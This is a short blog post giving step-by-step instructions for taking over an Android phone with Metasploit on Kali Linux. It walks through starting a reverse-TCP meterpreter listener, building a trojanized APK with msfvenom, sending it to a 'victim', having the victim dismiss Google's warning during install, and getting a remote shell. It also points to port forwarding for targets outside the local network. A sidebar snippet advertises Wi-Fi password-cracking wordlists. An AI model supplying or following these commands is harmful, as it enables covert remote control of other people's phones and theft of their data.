This is How Hacker hack Android with Metasploit on Kali Linux with Easiest Way of Port Forwarding.

<! --- Banner2 -->

Welcome in INDIA_TECH

Hack android with metasploit...


  • Open your Terminal first   
  • Now enter command - msfconsole

  • then enter - { use exploit\multi\handler }
  • after that press enter..
  • command [ set payload android/meterpreter/reverse_tcp ]
  • after pressing enter, enter command [ set LHOST = youripaddress ] ( if you don't no your ip address you can check from command [ ifconfig ] after writting this command check wlan0(wifi) if  you are using, if not check anthor one(eth0(Ethernet))... from here you can take the ipaddress)
  • then command [ set LPORT 4444 ]
  • after pressing enter button, [ enter command [ exploit ] ]

After this you have create a payload for android...

<! --- Banner2 -->
  1. enter given command on 2 number
  2. [msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4040 R> app.apk ]
  3. Now the app is ready for sending to victim 
  4. after installing app, in between if it ask for sending to google click on No, Thanks
  5. click open..

Now, You are ready for hack

  • If it shows [ meterpreter ]
  • enter command [ ? ]
  • To show help

If you want to hack out of network connection...

mean that - victim mobile that you want to hack, it would not connect with wifi which is connect with your hacking device. 

For this See Video : - 




Subscribe, Like and share...

                                                     From here...


This is How Hacker hack Android with Metasploit on Kali Linux with Easiest Way of Port Forwarding. This is How Hacker hack Android with Metasploit on Kali Linux with Easiest Way of Port Forwarding. Reviewed by Adarsh Raj on March 29, 2020 Rating: 5

No comments:

Wordlist For Wi-Fi Hashes Cracking || Big Word List Files ||

Keep See at Last #1 Small Files Below are some dictionaries that can be used with Backtrack or Kali Linux. They are plain Wordlist dictionar...

Powered by Blogger.